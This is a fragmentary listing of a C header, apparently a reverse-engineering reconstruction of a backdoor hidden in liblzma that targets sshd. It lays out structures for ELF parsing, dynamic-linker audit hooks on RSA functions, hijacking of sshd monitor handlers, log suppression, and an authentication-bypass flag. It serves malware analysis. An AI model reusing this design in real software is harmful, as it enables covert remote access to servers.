16 #include <sys/select.h>
24 typedef uintptr_t uptr;
27 typedef unsigned int pid_t;
28 typedef unsigned int uid_t;
29 typedef unsigned int gid_t;
30 typedef unsigned int mode_t;
32 typedef uint16_t Elf64_Half;
33 typedef uint32_t Elf64_Word;
34 typedef int32_t Elf64_Sword;
35 typedef uint64_t Elf64_Xword;
36 typedef int64_t Elf64_Sxword;
37 typedef uint32_t Elf32_Addr;
38 typedef uint64_t Elf64_Addr;
39 typedef uint64_t Elf64_Off;
40 typedef uint16_t Elf64_Section;
42 typedef Elf64_Xword Elf64_Relr;
44 #define EI_NIDENT (16)
47 unsigned char e_ident[EI_NIDENT];
56 Elf64_Half e_phentsize;
58 Elf64_Half e_shentsize;
60 Elf64_Half e_shstrndx;
89 unsigned char st_info;
90 unsigned char st_other;
91 Elf64_Section st_shndx;
100 Elf64_Sxword r_addend;
104 Elf32_Sym, Elf64_Relr,
105 Elf64_Verdef, Elf64_Versym, sigset_t, fd_set, EVP_PKEY, RSA, DSA,
106 BIGNUM, EC_POINT, EC_KEY, EC_GROUP, EVP_MD, point_conversion_form_t,
107 EVP_CIPHER, EVP_CIPHER_CTX, ENGINE, EVP_MD_CTX, EVP_PKEY_CTX, BN_CTX;
109 void *(*alloc)(
void *opaque,
size_t nmemb,
size_t size);
110 void (*free)(
void *opaque,
void *ptr);
114 typedef long int Lmid_t;
115 #define ElfW(Sym) Elf64_Sym
133 LZMA_CHECK_CRC32 = 1,
140 LZMA_CHECK_CRC64 = 4,
147 LZMA_CHECK_SHA256 = 10
159 #include <openssl/dsa.h>
160 #include <openssl/ec.h>
161 #include <openssl/evp.h>
162 #include <openssl/rsa.h>
165 typedef Elf64_Xword Elf64_Relr;
168 #define UPTR(x) ((uptr)(x))
169 #define PTRADD(a, b) (UPTR(a) + UPTR(b))
170 #define PTRDIFF(a, b) (UPTR(a) - UPTR(b))
178 #define BUILD_BUG_ON_ZERO(e) ((int)(sizeof(struct { int:(-!!(e)); })))
179 #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
180 #define __must_be_array(a) BUILD_BUG_ON_ZERO(__same_type((a), &(a)[0]))
181 #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) + __must_be_array(arr))
187 unsigned int bindflags;
190 typedef struct link_map *lookup_t;
197 uint32_t bloom_shift;
207 struct La_i86_retval;
208 struct La_x86_64_regs;
209 struct La_x86_64_retval;
211 struct La_x32_retval;
217 void (*activity) (uintptr_t *,
unsigned int);
218 char *(*objsearch) (
const char *, uintptr_t *,
unsigned int);
219 unsigned int (*objopen) (
struct link_map *, Lmid_t, uintptr_t *);
220 void (*preinit) (uintptr_t *);
223 uintptr_t (*symbind32) (Elf32_Sym *,
unsigned int, uintptr_t *,
224 uintptr_t *,
unsigned int *,
const char *);
225 uintptr_t (*symbind64) (Elf64_Sym *,
unsigned int, uintptr_t *,
226 uintptr_t *,
unsigned int *,
const char *);
230 Elf32_Addr (*i86_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
231 uintptr_t *,
struct La_i86_regs *,
232 unsigned int *,
const char *name,
233 long int *framesizep);
234 Elf64_Addr (*x86_64_gnu_pltenter) (Elf64_Sym *,
unsigned int,
236 uintptr_t *,
struct La_x86_64_regs *,
237 unsigned int *,
const char *name,
238 long int *framesizep);
239 Elf32_Addr (*x32_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
240 uintptr_t *,
struct La_x32_regs *,
241 unsigned int *,
const char *name,
242 long int *framesizep);
246 unsigned int (*i86_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
247 uintptr_t *,
const struct La_i86_regs *,
248 struct La_i86_retval *,
const char *);
249 unsigned int (*x86_64_gnu_pltexit) (Elf64_Sym *,
unsigned int,
252 const struct La_x86_64_regs *,
253 struct La_x86_64_retval *,
255 unsigned int (*x32_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
257 const struct La_x32_regs *,
258 struct La_x86_64_retval *,
261 unsigned int (*objclose) (uintptr_t *);
293 #define CHACHA20_KEY_SIZE 32
294 #define CHACHA20_IV_SIZE 16
295 #define SHA256_DIGEST_SIZE 32
296 #define ED448_KEY_SIZE 57
297 #define ED448_SIGNATURE_SIZE 114
299 #define X_BN_num_bytes(bits) (((bits)+7)/8)
302 #define XZDASM_OPC(op) ((u8)(op) - 0x80)
305 X86_OPCODE_LEA = 0x8D,
306 X86_OPCODE_CALL = 0xE8,
308 X86_OPCODE_CMP = 0x3B,
310 X86_OPCODE_MOV = 0x89,
312 X86_OPCODE_MOV_LOAD = 0x8B,
315 X86_OPCODE_MOV_STORE = 0x8C
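/*
 * Tests bit (XZDASM_OPC(opcode) + offset) of 'mask' and yields 1 if it is set,
 * 0 otherwise.
 *
 * Every macro argument is parenthesized so callers can pass compound
 * expressions (e.g. `a | b` as the mask, or `x - y` as the offset) without
 * the precedence of `>>` or `+` silently rebinding them; the original form
 * would have parsed `a | b >> n` as `a | (b >> n)`.
 *
 * NOTE(review): the shift amount is truncated to u8 and is not range-checked.
 * A shift count >= the bit width of 'mask' is undefined behavior in C, so
 * callers must guarantee that the computed bit index stays in range.
 */
#define XZDASM_TEST_MASK(mask, offset, opcode) \
	((((mask) >> ((u8)(XZDASM_OPC(opcode) + (offset)))) & 1) == 1)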
355 DF2_MEM_SEG_OFFS = 0x4,
358 DF2_FLAGS_MEM = DF2_MEM_DISP | DF2_MEM_DISP8 | DF2_MEM_SEG_OFFS,
406 X_ELF_DYNAMIC_LINKER = 1,
412 XREF_xcalloc_zero_size = 0,
413 XREF_Could_not_chdir_to_home_directory_s_s = 1,
414 XREF_list_hostkey_types = 2,
415 XREF_demote_sensitive_data = 3,
416 XREF_mm_terminate = 4,
417 XREF_mm_pty_allocate = 5,
418 XREF_mm_do_pam_account = 6,
419 XREF_mm_session_pty_cleanup2 = 7,
420 XREF_mm_getpwnamallow = 8,
421 XREF_mm_sshpam_init_ctx = 9,
422 XREF_mm_sshpam_query = 10,
423 XREF_mm_sshpam_respond = 11,
424 XREF_mm_sshpam_free_ctx = 12,
425 XREF_mm_choose_dh = 13,
426 XREF_sshpam_respond = 14,
427 XREF_sshpam_auth_passwd = 15,
428 XREF_sshpam_query = 16,
430 XREF_mm_request_send = 18,
431 XREF_mm_log_handler = 19,
432 XREF_Could_not_get_agent_socket = 20,
433 XREF_auth_root_allowed = 21,
434 XREF_mm_answer_authpassword = 22,
435 XREF_mm_answer_keyallowed = 23,
436 XREF_mm_answer_keyverify = 24,
437 XREF_48s_48s_d_pid_ld_ = 25,
438 XREF_Unrecognized_internal_syslog_level_code_d = 26
444 STR_48s_48s_d_pid_ld_ = 0xd8,
446 STR_usr_sbin_sshd = 0x108,
447 STR_Accepted_password_for = 0x870,
448 STR_Accepted_publickey_for = 0x1a0,
449 STR_BN_bin2bn = 0xc40,
450 STR_BN_bn2bin = 0x6d0,
453 STR_BN_num_bits = 0x4e0,
454 STR_Connection_closed_by = 0x790,
455 STR_Could_not_chdir_to_home_directory_s_s = 0x18,
456 STR_Could_not_get_agent_socket = 0xb0,
458 STR_DSA_get0_pqg = 0x9d0,
459 STR_DSA_get0_pub_key = 0x468,
460 STR_EC_KEY_get0_group = 0x7e8,
461 STR_EC_KEY_get0_public_key = 0x268,
462 STR_EC_POINT_point2oct = 0x6e0,
463 STR_EVP_CIPHER_CTX_free = 0xb28,
464 STR_EVP_CIPHER_CTX_new = 0x838,
465 STR_EVP_DecryptFinal_ex = 0x2a8,
466 STR_EVP_DecryptInit_ex = 0xc08,
467 STR_EVP_DecryptUpdate = 0x3f0,
468 STR_EVP_Digest = 0xf8,
469 STR_EVP_DigestVerify = 0x408,
470 STR_EVP_DigestVerifyInit = 0x118,
471 STR_EVP_MD_CTX_free = 0xd10,
472 STR_EVP_MD_CTX_new = 0xaf8,
473 STR_EVP_PKEY_free = 0x6f8,
474 STR_EVP_PKEY_new_raw_public_key = 0x758,
475 STR_EVP_PKEY_set1_RSA = 0x510,
476 STR_EVP_chacha20 = 0xc28,
477 STR_EVP_sha256 = 0xc60,
479 STR_GLIBC_2_2_5 = 0x8c0,
480 STR_GLRO_dl_naudit_naudit = 0x6a8,
481 STR_KRB5CCNAME = 0x1e0,
482 STR_LD_AUDIT = 0xcf0,
483 STR_LD_BIND_NOT = 0xbc0,
484 STR_LD_DEBUG = 0xa90,
485 STR_LD_PROFILE = 0xb98,
486 STR_LD_USE_LOAD_BIAS = 0x3e0,
488 STR_RSA_free = 0xac0,
489 STR_RSA_get0_key = 0x798,
491 STR_RSA_public_decrypt = 0x1d0,
492 STR_RSA_set0_key = 0x540,
493 STR_RSA_sign = 0x8f8,
496 STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
497 STR_WAYLAND_DISPLAY = 0x158,
498 STR_errno_location = 0x878,
499 STR_libc_stack_end = 0x2b0,
500 STR_libc_start_main = 0x228,
501 STR_dl_audit_preinit = 0xa60,
502 STR_dl_audit_symbind_alt = 0x9c8,
505 STR_rtld_global = 0x5b8,
506 STR_rtld_global_ro = 0xa98,
507 STR_auth_root_allowed = 0xb8,
508 STR_authenticating = 0x1d8,
509 STR_demote_sensitive_data = 0x28,
511 STR_ld_linux_x86_64_so = 0xa48,
513 STR_libcrypto_so = 0x7c0,
514 STR_liblzma_so = 0x590,
515 STR_libsystemd_so = 0x938,
516 STR_list_hostkey_types = 0x20,
517 STR_malloc_usable_size = 0x440,
518 STR_mm_answer_authpassword = 0xc0,
519 STR_mm_answer_keyallowed = 0xc8,
520 STR_mm_answer_keyverify = 0xd0,
521 STR_mm_answer_pam_start = 0x948,
522 STR_mm_choose_dh = 0x78,
523 STR_mm_do_pam_account = 0x40,
524 STR_mm_getpwnamallow = 0x50,
525 STR_mm_log_handler = 0xa8,
526 STR_mm_pty_allocate = 0x38,
527 STR_mm_request_send = 0xa0,
528 STR_mm_session_pty_cleanup2 = 0x48,
529 STR_mm_sshpam_free_ctx = 0x70,
530 STR_mm_sshpam_init_ctx = 0x58,
531 STR_mm_sshpam_query = 0x60,
532 STR_mm_sshpam_respond = 0x68,
533 STR_mm_terminate = 0x30,
534 STR_parse_PAM = 0xc58,
535 STR_password = 0x400,
538 STR_publickey = 0x7b8,
540 STR_rsa_sha2_256 = 0x710,
541 STR_setlogmask = 0x428,
542 STR_setresgid = 0x5f0,
543 STR_setresuid = 0xab8,
544 STR_shutdown = 0x760,
546 STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
547 STR_sshpam_auth_passwd = 0x88,
548 STR_sshpam_query = 0x90,
549 STR_sshpam_respond = 0x80,
550 STR_start_pam = 0x98,
555 STR_xcalloc_zero_size = 0x10,
556 STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
561 PAYLOAD_STATE_INITIAL = -1
565 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
567 #define assert_offset(t, f, o)
570 #define CONCAT(x, y) x ## y
571 #define EXPAND(x, y) CONCAT(x, y)
572 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
585 static_assert(
sizeof(
struct sshbuf) == 64);
590 #define PERMIT_NOT_SET -1
592 #define PERMIT_FORCED_ONLY 1
593 #define PERMIT_NO_PASSWD 2
612 struct sshkey **host_keys;
613 struct sshkey **host_pubkeys;
614 struct sshkey **host_certificates;
644 struct sshbuf *sk_key_handle;
645 struct sshbuf *sk_reserved;
647 struct sshkey_cert *cert;
649 u8 *shielded_private;
652 size_t shield_prekey_len;
655 typedef struct __attribute__((packed))
got_ctx {
679 assert_offset(
got_ctx_t, return_address, 0x8);
680 assert_offset(
got_ctx_t, cpuid_fn, 0x10);
681 assert_offset(
got_ctx_t, got_offset, 0x18);
682 static_assert(
sizeof(
got_ctx_t) == 0x20);
704 #define X86_MODRM_BYTE(mod, reg, rm) \
706 | (u8)(((mod) & 3) << 6) \
707 | (u8)(((reg) & 7) << 3) \
711 #define X86_REX_BYTE(w,r,x,b) \
713 | (u8)(((w) & 1) << 3) \
714 | (u8)(((r) & 1) << 2) \
715 | (u8)(((x) & 1) << 1) \
716 | (u8)(((b) & 1) << 0) \
719 #define X86_REX_W X86_REX_BYTE(1,0,0,0)
724 #define XZDASM_MODRM_MAKE(mod, reg, rm) \
726 | (u32)(((rm) & 0xFF)<< 24) \
727 | (u32)(((reg) & 0xFF) << 16) \
728 | (u32)(((mod) & 0xFF) << 8) \
729 | X86_MODRM_BYTE(mod, reg, rm) \
732 enum dasm_modrm_mask {
733 XZ_MODRM_RM = 0xFF000000,
734 XZ_MODRM_REG = 0x00FF0000,
735 XZ_MODRM_MOD = 0x0000FF00,
736 XZ_MODRM_RAW = 0x000000FF
741 u64 instruction_size;
743 struct __attribute__((packed)) {
761 struct __attribute__((packed)) {
772 struct __attribute__((packed)) {
784 struct __attribute__((packed)) {
786 struct __attribute__((packed)) {
801 u64 operand_zeroextended;
808 assert_offset(
dasm_ctx_t, instruction_size, 8);
811 assert_offset(
dasm_ctx_t, lock_rep_byte, 0x14);
831 assert_offset(
dasm_ctx_t, operand_zeroextended, 0x40);
832 assert_offset(
dasm_ctx_t, operand_size, 0x48);
899 Elf64_Versym *versym;
900 Elf64_Rela *rela_relocs;
903 Elf64_Relr *relr_relocs;
917 u64 rodata_segment_start;
918 u64 rodata_segment_size;
919 u64 data_segment_start;
920 u64 data_segment_size;
921 u64 data_segment_alignment;
933 u32 gnu_hash_bloom_shift;
936 u32 *gnu_hash_buckets;
945 assert_offset(
elf_info_t, dyn_num_entries, 0x28);
949 assert_offset(
elf_info_t, plt_relocs_num, 0x48);
950 assert_offset(
elf_info_t, gnurelro_found, 0x4C);
951 assert_offset(
elf_info_t, gnurelro_vaddr, 0x50);
952 assert_offset(
elf_info_t, gnurelro_memsize, 0x58);
957 assert_offset(
elf_info_t, rela_relocs_num, 0x80);
959 assert_offset(
elf_info_t, relr_relocs_num, 0x90);
960 assert_offset(
elf_info_t, code_segment_start, 0x98);
961 assert_offset(
elf_info_t, code_segment_size, 0xA0);
962 assert_offset(
elf_info_t, rodata_segment_start, 0xA8);
963 assert_offset(
elf_info_t, rodata_segment_size, 0xB0);
964 assert_offset(
elf_info_t, data_segment_start, 0xB8);
965 assert_offset(
elf_info_t, data_segment_size, 0xC0);
966 assert_offset(
elf_info_t, data_segment_alignment, 0xC8);
968 assert_offset(
elf_info_t, gnu_hash_nbuckets, 0xd8);
969 assert_offset(
elf_info_t, gnu_hash_last_bloom, 0xdc);
970 assert_offset(
elf_info_t, gnu_hash_bloom_shift, 0xe0);
971 assert_offset(
elf_info_t, gnu_hash_bloom, 0xe8);
972 assert_offset(
elf_info_t, gnu_hash_buckets, 0xf0);
973 assert_offset(
elf_info_t, gnu_hash_chain, 0xf8);
977 u32 resolved_imports_count;
979 size_t (*malloc_usable_size)(
void *ptr);
980 uid_t (*getuid)(void);
981 void (*exit)(
int status);
982 int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
983 int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
984 int (*system)(
const char *command);
985 ssize_t (*write)(
int fd,
const void *buf,
size_t count);
987 int nfds, fd_set *readfds, fd_set *writefds,
988 fd_set *exceptfds,
const struct timespec *timeout,
989 const sigset_t *sigmask);
990 ssize_t (*read)(
int fd,
void *buf,
size_t count);
991 int *(*__errno_location)(void);
992 int (*setlogmask)(
int mask);
993 int (*shutdown)(
int sockfd,
int how);
994 void *__libc_stack_end;
1013 typedef int (*pfn_RSA_public_decrypt_t)(
1014 int flen,
unsigned char *from,
unsigned char *to,
1015 RSA *rsa,
int padding);
1016 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey,
struct rsa_st *key);
1017 typedef void (*pfn_RSA_get0_key_t)(
1019 const BIGNUM **n,
const BIGNUM **e,
const BIGNUM **d);
1023 pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
1025 void (*RSA_get0_key_null)(
1026 const RSA *r,
const BIGNUM **n,
1027 const BIGNUM **e,
const BIGNUM **d);
1032 pfn_RSA_public_decrypt_t *RSA_public_decrypt_plt;
1037 pfn_EVP_PKEY_set1_RSA_t *EVP_PKEY_set1_RSA_plt;
1042 pfn_RSA_get0_key_t *RSA_get0_key_plt;
1043 void (*DSA_get0_pqg)(
1044 const DSA *d,
const BIGNUM **p,
1045 const BIGNUM **q,
const BIGNUM **g);
1046 const BIGNUM *(*DSA_get0_pub_key)(
const DSA *d);
1047 size_t (*EC_POINT_point2oct)(
1048 const EC_GROUP *group,
const EC_POINT *p,
1049 point_conversion_form_t form,
unsigned char *buf,
1050 size_t len, BN_CTX *ctx);
1051 EC_POINT *(*EC_KEY_get0_public_key)(
const EC_KEY *key);
1052 const EC_GROUP *(*EC_KEY_get0_group)(
const EC_KEY *key);
1053 EVP_MD *(*EVP_sha256)(void);
1054 pfn_RSA_get0_key_t RSA_get0_key;
1055 int (*BN_num_bits)(
const BIGNUM *a);
1056 EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
1057 int type, ENGINE *e,
1058 const unsigned char *key,
size_t keylen);
1059 EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
1060 int (*EVP_DigestVerifyInit)(
1061 EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
1062 const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
1063 int (*EVP_DigestVerify)(
1064 EVP_MD_CTX *ctx,
const unsigned char *sig,
1065 size_t siglen,
const unsigned char *tbs,
size_t tbslen);
1066 void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
1067 void (*EVP_PKEY_free)(EVP_PKEY *key);
1068 EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
1069 int (*EVP_DecryptInit_ex)(
1070 EVP_CIPHER_CTX *ctx,
const EVP_CIPHER *type,
1071 ENGINE *impl,
const unsigned char *key,
const unsigned char *iv);
1072 int (*EVP_DecryptUpdate)(
1073 EVP_CIPHER_CTX *ctx,
unsigned char *out,
1074 int *outl,
const unsigned char *in,
int inl);
1075 int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx,
unsigned char *outm,
int *outl);
1076 void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
1077 const EVP_CIPHER *(*EVP_chacha20)(void);
1078 RSA *(*RSA_new)(void);
1079 BIGNUM *(*BN_dup)(
const BIGNUM *from);
1080 BIGNUM *(*BN_bin2bn)(
const unsigned char *s,
int len, BIGNUM *ret);
1081 int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
1083 const void *data,
size_t count,
unsigned char *md,
1084 unsigned int *size,
const EVP_MD *type, ENGINE *impl);
1087 const unsigned char *m,
unsigned int m_len,
1088 unsigned char *sigret,
unsigned int *siglen, RSA *rsa);
1089 int (*BN_bn2bin)(
const BIGNUM *a,
unsigned char *to);
1090 void (*RSA_free)(RSA *rsa);
1091 void (*BN_free)(BIGNUM *a);
1093 u32 resolved_imports_count;
1139 typedef int (*sshd_monitor_func_t)(
struct ssh *ssh,
int sock,
struct sshbuf *m);
1142 BOOL have_mm_answer_keyallowed;
1143 BOOL have_mm_answer_authpassword;
1144 BOOL have_mm_answer_keyverify;
1147 void *mm_answer_keyallowed;
1148 void *mm_answer_keyverify;
1149 void *mm_answer_authpassword_start;
1150 void *mm_answer_authpassword_end;
1151 sshd_monitor_func_t *mm_answer_authpassword_ptr;
1152 int monitor_reqtype_authpassword;
1154 sshd_monitor_func_t *mm_answer_keyallowed_start;
1155 void *mm_answer_keyallowed_end;
1156 void *mm_answer_keyallowed_ptr;
1157 u32 mm_answer_keyallowed_reqtype;
1159 void *mm_answer_keyverify_start;
1160 void *mm_answer_keyverify_end;
1161 void *mm_answer_keyverify_ptr;
1168 char *STR_unknown_ptr;
1169 void *mm_request_send_start;
1170 void *mm_request_send_end;
1171 PADDING(
sizeof(u32));
1172 PADDING(
sizeof(u32));
1174 int *permit_root_login_ptr;
1175 char *STR_without_password;
1176 char *STR_publickey;
1179 assert_offset(
sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
1180 assert_offset(
sshd_ctx_t, have_mm_answer_authpassword, 0x4);
1181 assert_offset(
sshd_ctx_t, have_mm_answer_keyverify, 0x8);
1183 assert_offset(
sshd_ctx_t, mm_answer_keyallowed, 0x18);
1184 assert_offset(
sshd_ctx_t, mm_answer_keyverify, 0x20);
1185 assert_offset(
sshd_ctx_t, mm_answer_authpassword_start, 0x28);
1186 assert_offset(
sshd_ctx_t, mm_answer_authpassword_end, 0x30);
1187 assert_offset(
sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
1188 assert_offset(
sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
1189 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
1190 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
1191 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
1192 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_reqtype, 0x60);
1193 assert_offset(
sshd_ctx_t, mm_answer_keyverify_start, 0x68);
1194 assert_offset(
sshd_ctx_t, mm_answer_keyverify_end, 0x70);
1195 assert_offset(
sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
1196 assert_offset(
sshd_ctx_t, writebuf_size, 0x84);
1198 assert_offset(
sshd_ctx_t, STR_unknown_ptr, 0xA0);
1199 assert_offset(
sshd_ctx_t, mm_request_send_start, 0xA8);
1200 assert_offset(
sshd_ctx_t, mm_request_send_end, 0xB0);
1201 assert_offset(
sshd_ctx_t, use_pam_ptr, 0xC0);
1202 assert_offset(
sshd_ctx_t, permit_root_login_ptr, 0xC8);
1203 assert_offset(
sshd_ctx_t, STR_without_password, 0xD0);
1204 assert_offset(
sshd_ctx_t, STR_publickey, 0xD8);
1211 SYSLOG_LEVEL_VERBOSE,
1212 SYSLOG_LEVEL_DEBUG1,
1213 SYSLOG_LEVEL_DEBUG2,
1214 SYSLOG_LEVEL_DEBUG3,
1215 SYSLOG_LEVEL_NOT_SET = -1
1218 typedef void (*log_handler_fn)(
1225 BOOL logging_disabled;
1226 BOOL log_hooking_possible;
1227 BOOL syslog_disabled;
1229 char *STR_percent_s;
1230 char *STR_Connection_closed_by;
1232 char *STR_authenticating;
1236 void *log_handler_ptr;
1237 void *log_handler_ctx_ptr;
1238 log_handler_fn orig_log_handler;
1239 void *orig_log_handler_ctx;
1241 void (*mm_log_handler)(
int level,
int forced,
const char *msg,
void *ctx);
1262 struct __attribute__((packed)) {
1270 struct __attribute__((packed)) {
1271 u8 sshbuf_data_qword_index;
1272 u8 sshbuf_size_qword_index;
1330 struct monitor **struct_monitor_ptr_address;
1367 u64 sock_read_buf_size;
1368 u8 sock_read_buf[64];
1369 u64 payload_data_size;
1378 u32 sshd_host_pubkey_idx;
1383 u8 secret_data[ED448_KEY_SIZE];
1389 u8 shift_operations[31];
1434 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1537 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
1553 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1558 pfn_RSA_get0_key_t hook_RSA_get0_key;
1560 u64 hooks_installed;
1563 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
1564 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
1565 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
1566 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
1567 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
1568 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
1569 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
1570 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
1571 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
1573 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
1574 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
1575 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
1577 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
1578 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
1580 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
1591 u64 signed_data_size;
1609 uintptr_t (*symbind64)(
1610 Elf64_Sym *sym,
unsigned int ndx,
1611 uptr *refcook, uptr *defcook,
1612 unsigned int flags,
const char *symname);
1614 pfn_RSA_get0_key_t hook_RSA_get0_key;
1615 log_handler_fn mm_log_handler;
1616 PADDING(
sizeof(
void *));
1617 PADDING(
sizeof(
void *));
1618 sshd_monitor_func_t mm_answer_keyallowed;
1619 sshd_monitor_func_t mm_answer_keyverify;
1620 PADDING(
sizeof(
void *));
1676 Elf64_Ehdr *dynamic_linker_ehdr;
1677 void **__libc_stack_end;
1681 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
1682 assert_offset(
main_elf_t, __libc_stack_end, 0x10);
1746 struct link_map *liblzma_map;
1747 struct link_map *libcrypto_map;
1748 struct link_map *libsystemd_map;
1749 struct link_map *libc_map;
1786 lzma_allocator fake_allocator;
1862 u32 operation_index;
1882 struct __attribute__((packed)) {
1891 typedef union __attribute__((packed)) {
1905 u8 signature[ED448_SIGNATURE_SIZE];
1920 struct __attribute__((packed)) {
1933 struct __attribute__((packed)) {
1944 #define TEST_FLAG(x, flag) (((x) & (flag)) != 0)
1983 X_FLAGS2_AUTH_BYPASS = 0x4,
2021 const BIGNUM *rsa_n;
2022 const BIGNUM *rsa_e;
2025 PADDING(CHACHA20_KEY_SIZE + CHACHA20_IV_SIZE);
2026 u8 ivec[CHACHA20_IV_SIZE];
2027 u8 ed448_key[ED448_KEY_SIZE];
2034 assert_offset(
key_ctx_t, payload, 0x15);
2036 assert_offset(
key_ctx_t, ed448_key, 0x27D);
2046 const BIGNUM *rsa_n;
2047 const BIGNUM *rsa_e;
2049 u16 payload_body_size;
2068 struct timespec timespec;
2083 u64 hostkey_hash_offset;
2085 u8 *payload_data_ptr;
2094 struct __attribute__((packed)) {
2099 struct __attribute__((packed)) {
2101 u64 num_host_pubkeys;
2102 u8 ed448_key[ED448_KEY_SIZE];
2173 PADDING(
sizeof(u64));
2180 PADDING(
sizeof(u64));
2181 PADDING(
sizeof(u64));
2188 PADDING(
sizeof(u64));
2203 PADDING(
sizeof(u64));
2204 lzma_allocator allocator;
2234 u8 *output_register;
2367 BOOL is_64bit_operand,
2390 BOOL is_64bit_operand,
2456 EncodedStringId encoded_string_id,
2510 FuncFindType find_mode);
2569 extern char *check_argument(
char arg_first_char,
char* arg_name);
2682 EncodedStringId encoded_string_id);
2716 StringXrefId xref_id,
2717 void **pOutCodeStart,
void **pOutCodeEnd,
2736 EncodedStringId *stringId_inOut,
2737 void *rodata_start_ptr);
2807 unsigned shift_count, BOOL start_from_call);
2821 unsigned operation_index,
2822 unsigned shift_count,
2823 int index, u8 *code);
2851 unsigned shift_count,
unsigned operation_index);
2896 u8 *call_site, u8 *code,
2898 unsigned shift_count,
unsigned operation_index);
2913 unsigned shift_count,
unsigned operation_index,
3030 struct link_map *libc,
3107 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
3148 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
3161 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
3249 uptr *refcook, uptr *defcook,
3251 const char *symname);
3282 ptrdiff_t *libname_offset,
3310 ptrdiff_t *libname_offset,
3357 ptrdiff_t libname_offset,
3400 void **sensitive_data_out);
3421 void **sensitive_data_out,
3491 u8 *buffer, u64 bufferSize,
3572 u64 sshkey_digest_offset,
3573 u64 signed_data_size,
3591 BOOL skip_root_patch,
3593 BOOL replace_monitor_reqtype,
3594 int monitor_reqtype,
3622 u8 **code_start_out,
3660 void **monitor_field_ptr_out,
3678 void *mem_range_start,
3746 enum SocketMode socket_direction
3792 struct sshbuf *sshbuf_data,
3794 size_t *out_payload_size,
3807 size_t payload_size,
3902 unsigned int num_pointers
3931 int flen,
unsigned char *from,
3932 unsigned char *to, RSA *rsa,
int padding);
3944 LogLevel level,
const char *fmt, ...);
4010 static_assert(
sizeof(global_ctx) ==
sizeof(
void *));
4013 static_assert(
sizeof(hooks_data) ==
sizeof(
void *));
int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
Definition: ssh_patch.c:37
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:2145
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:2133
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:2139
data passed to functions that access the backdoor data
Definition: xzre.h:1690
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1735
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1780
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1785
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1740
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1770
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1775
elf_info_t dynamic_linker_info
